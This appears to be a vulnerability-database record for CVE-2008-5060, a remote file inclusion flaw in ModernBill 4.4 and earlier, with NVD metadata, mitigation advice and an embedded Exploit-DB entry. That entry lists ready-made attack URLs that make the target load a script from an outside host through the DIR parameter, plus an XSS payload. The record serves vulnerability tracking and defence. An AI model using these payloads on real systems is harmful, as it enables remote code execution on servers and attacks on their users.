ID CVE-2008-5060
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:32:00
Description
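Multiple PHP remote file inclusion vulnerabilities in ModernBill 4.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to (1) export_batch.inc.php, (2) run_auto_suspend.cron.php, and (3) send_email_cache.php in include/scripts/; (4) include/misc/mod_2checkout/2checkout_return.inc.php; and (5) include/html/nettools.popup.php. These are different vectors than those covered by CVE-2006-4034 and CVE-2005-1054. Because the issue depends on PHP including a file from an attacker-supplied URL, exposure also depends on the PHP configuration permitting URL includes (allow_url_fopen, and allow_url_include on PHP 5.2 and later). On installations that cannot be upgraded, disabling those settings and denying direct web requests to scripts under include/ that do not need to be reached directly reduces the risk. Requests to the listed scripts that carry a URL in the DIR parameter are a useful thing to look for in web server logs.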
{"id": "CVE-2008-5060", "bulletinFamily": "NVD", "title": "CVE-2008-5060", "description": "Multiple PHP remote file inclusion vulnerabilities in ModernBill 4.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to (1) export_batch.inc.php, (2) run_auto_suspend.cron.php, and (3) send_email_cache.php in include/scripts/; (4) include/misc/mod_2checkout/2checkout_return.inc.php; and (5) include/html/nettools.popup.php, different vectors than CVE-2006-4034 and CVE-2005-1054.", "published": "2008-11-13T11:30:00", "modified": "2017-09-29T01:32:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5060", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/32529", "https://www.exploit-db.com/exploits/6916", "http://securityreason.com/securityalert/4587", "https://exchange.xforce.ibmcloud.com/vulnerabilities/46513"], "cvelist": ["CVE-2008-5060"], "type": "cve", "lastseen": "2020-12-09T19:28:26", "edition": 5, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6916"]}], "modified": "2020-12-09T19:28:26", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2020-12-09T19:28:26", "rev": 2}, "vulnersScore": 8.0}, "cpe": ["cpe:/a:modernbill:modernbill:4.1.1", "cpe:/a:modernbill:modernbill:4.0.1", "cpe:/a:modernbill:modernbill:4.1.3", "cpe:/a:modernbill:modernbill:4.3.2", "cpe:/a:modernbill:modernbill:3.1.3", "cpe:/a:modernbill:modernbill:4.0.2", "cpe:/a:modernbill:modernbill:4.4.0", "cpe:/a:modernbill:modernbill:3.0", "cpe:/a:modernbill:modernbill:4.1.2", "cpe:/a:modernbill:modernbill:2.01", "cpe:/a:modernbill:modernbill:3.1.0", "cpe:/a:modernbill:modernbill:4.2.1", "cpe:/a:modernbill:modernbill:4.3.0", "cpe:/a:modernbill:modernbill:4.4", "cpe:/a:modernbill:modernbill:2.02s"], "affectedSoftware": [{"cpeName": "modernbill:modernbill", "name": "modernbill", 
"operator": "eq", "version": "3.1.3"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.0.1"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.0.1"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.1.1"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.0.2"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "le", "version": "4.4"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "3.1.0"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.1.2"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.3.2"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "le", "version": "4.4.0"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "2.01"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.1.3"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.2.1"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.3.0"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "3.0"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "2.02s"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, 
"cpe23": ["cpe:2.3:a:modernbill:modernbill:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:2.01:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.0.1:rc8:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:2.02s:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:3.0:beta:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.0.1:rc7:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.0.2:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:2.01:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:3.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.0.1:rc7:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.4:*:*:*:*:*:*:*", "versionEndIncluding": "4.4", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:3.1.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:2.02s:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.4.0:*:*:*:*:*:*:*", 
"versionEndIncluding": "4.4.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.0.1:rc8:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:3.0:beta:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-01T00:57:47", "description": "ModernBill <= 4.4.x XSS / Remote File Inclusion Vulnerability. CVE-2008-5059,CVE-2008-5060. Webapps exploit for php platform", "published": "2008-10-31T00:00:00", "type": "exploitdb", "title": "ModernBill <= 4.4.x - XSS / Remote File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5060", "CVE-2008-5059"], "modified": "2008-10-31T00:00:00", "id": "EDB-ID:6916", "href": "https://www.exploit-db.com/exploits/6916/", "sourceData": "**************************************************************************************\nModernBill .:. Client Billing System - User Login\nModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411\nhttp://xc0r3.net/\nplezz go to ttp://xc0r3.net/forums/\n**************************************************************************************\n\nrfi\nhttp://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?\nhttp://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?\nhttp://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?\nhttp://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?\nhttp://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?\n\nxss\nhttp://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language=\"+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language=\"+onmouseover=alert(39660.2316362732)+\n\n**************************************************************************************\n\n# milw0rm.com [2008-10-31]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://www.exploit-db.com/download/6916/"}]}